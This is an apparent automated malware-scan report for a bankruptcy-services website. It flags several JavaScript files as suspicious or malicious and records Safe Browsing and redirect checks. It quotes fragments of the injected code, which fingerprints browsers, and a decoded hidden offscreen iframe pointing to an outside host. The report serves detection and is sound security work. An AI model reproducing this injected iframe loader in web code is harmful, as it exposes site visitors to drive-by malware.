Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yavbankrotstve.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://yavbankrotstve.com/ | 200 OK Content-Length: 11605 Content-Type: text/html | clean |
http://yavbankrotstve.com/templates/jblank/js/swfobject.js | 200 OK Content-Length: 11845 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (r_haystack, r_needle, r_offset) { var haystack = (r_haystack + '').toLowerCase(); var needle = (r_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, r_offset)) !== -1) { return index; } return false; } function browserData(){ var BrowserBlock = ['Series60','Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','N ...[3866 bytes skipped]... Decoded script: function f() { if (J) { return; } try { var Z = j.getElementsByTagName("body")[0].appendChild(C("span")); Z.parentNode.removeChild(Z); } catch (aa) { return; } J = true; var X = U.length; for (var Y = 0; Y < X; Y++) { U[Y](); } } <iframe src="http://posimak.flashllp.com/dahaerhjgfjeaureytruwru12.html" Name="Position" style="position:absolute;left:-1370px;top:-1370px;" height="160" width="160"></iframe> | ||
http://yandex.st/jquery/1.7.1/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: application/x-javascript | clean |
http://yavbankrotstve.com/modules/mod_swmenufree/fix_wmode2transparent_swf.js | 200 OK Content-Length: 4032 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (r_haystack, r_needle, r_offset) { var haystack = (r_haystack + '').toLowerCase(); var needle = (r_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, r_offset)) !== -1) { return index; } return false; } function browserData(){ var BrowserBlock = ['Series60','Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD if (this.name == "wmode") { flag=true; str_tag += '<PARAM NAME="' + this.name + '" VALUE="transparent">'; } else str_tag += '<PARAM NAME="' + this.name + '" VALUE="' + this.value + '">'; } }); if(!flag) str_tag += '<PARAM NAME="wmode" VALUE="transparent">'; str_tag += '</OBJECT>'; jQuery(str_tag).insertAfter(this); jQuery(this).remove(); }); } ;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: function LJQ() { var sc = document.createElement("script"); sc.type = "text/javascript"; sc.src = "http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"; sc.id = "script1"; sc.defer = "defer"; document.getElementsByTagName("head")[0].appendChild(sc); window.noConflict = true; } <iframe src="http://posimak.flashllp.com/dahaerhjgfjeaureytruwru12.html" Name="Position" style="position:absolute;left:-1370px;top:-1370px;" height="160" width="160"></iframe> Antivirus reports:
| ||
http://yavbankrotstve.com/modules/mod_swmenufree/jquery-1.6.min.js | 200 OK Content-Length: 92169 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (r_haystack, r_needle, r_offset) { var haystack = (r_haystack + '').toLowerCase(); var needle = (r_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, r_offset)) !== -1) { return index; } return false; } function browserData(){ var BrowserBlock = ['Series60','Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD Antivirus reports:
| ||
http://yavbankrotstve.com/modules/mod_swmenufree/DropDownMenuX_Packed.js | 200 OK Content-Length: 14338 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (r_haystack, r_needle, r_offset) { var haystack = (r_haystack + '').toLowerCase(); var needle = (r_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, r_offset)) !== -1) { return index; } return false; } function browserData(){ var BrowserBlock = ['Series60','Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD Antivirus reports:
| ||
http://yavbankrotstve.com/services | 200 OK Content-Length: 12190 Content-Type: text/html | clean |
http://yavbankrotstve.com/partners | 200 OK Content-Length: 11202 Content-Type: text/html | clean |
http://yavbankrotstve.com/yavprave.com | 404 Not Found Content-Length: 210 Content-Type: text/html | clean |
http://yavbankrotstve.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://yavbankrotstve.com/contacts | 200 OK Content-Length: 11310 Content-Type: text/html | clean |
http://yavbankrotstve.com/about | 200 OK Content-Length: 11064 Content-Type: text/html | clean |
http://yavbankrotstve.com/kejsy | 200 OK Content-Length: 11074 Content-Type: text/html | clean |
http://yavbankrotstve.com/publikatsii | 200 OK Content-Length: 12386 Content-Type: text/html | clean |
http://yavbankrotstve.com/publikatsii/vneshnee-upravlenie-pri-bankrotstve | 200 OK Content-Length: 20827 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yavbankrotstve.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 23 Jan 2015 10:40:26 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c3d2d83b2a7dae7de7a8348d76805d93=6d1bf056a7991f66b4120ce6e1e2ffb9; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: yavbankrotstve.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 23 Jan 2015 10:40:26 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c3d2d83b2a7dae7de7a8348d76805d93=6d1bf056a7991f66b4120ce6e1e2ffb9; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: yavbankrotstve.com
Referer: http://www.google.com/search?q=yavbankrotstve.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yavbankrotstve.com
Referer: http://www.google.com/search?q=yavbankrotstve.com
Result:
The result is similar to the first query. There are no suspicious redirects found.